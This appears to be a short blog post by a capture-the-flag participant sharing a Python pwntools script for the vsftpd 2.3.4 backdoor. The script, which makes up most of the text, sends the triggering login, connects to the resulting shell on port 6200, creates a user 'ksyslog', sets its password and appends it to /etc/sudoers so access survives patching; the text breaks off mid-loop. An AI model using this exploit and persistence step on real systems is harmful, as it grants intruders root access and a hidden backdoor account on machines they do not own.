vsftp 2.3.4 backdoor script
Sometime ago I participated in a security comeptition where we are required to attack and defend servers. The key was to capture flags upon successful root/system exploitation.
I did some recon on past year machine of the competition, and it appears that vsftp2.3.4 was availble the distributed VM to the competitors. As such, I wrote a simple script to add a user called 'ksyslog' using the vsftpd2.3.4 backdoor exploit, and adding that user to the sudoers. So if the service was patched, I would still have access to the victim machines.
from pwn import *
context(arch = 'i386', os = 'linux')
def vsftpd234(host):
conn = remote(host,21)
a = conn.recvline()
if "vsFTPd 2.3.4" in a:
print host + " vulnerable to vsftpd 2.3.4"
conn.send('USER pwned:)\r\n')
print conn.recvuntil(' ', drop=True)
conn.send('PASS pwned\r\n')
print conn.recvline()
pwn_con = remote(host,6200)
pwn_con.sendline('cd /tmp')
pwn_con.sendline('ls -la friendly')
output = pwn_con.recvline()
pwn_con.sendline('useradd ksyslog')
pwn_con.sendline('passwd ksyslog')
print pwn_con.recvuntil(' ', drop=True)
print output
output = pwn_con.recvline()
print output
pwn_con.sendline("echo 'ksyslog ALL=(ALL)ALL' >> /etc/sudoers")
print a
for i in range(start,end):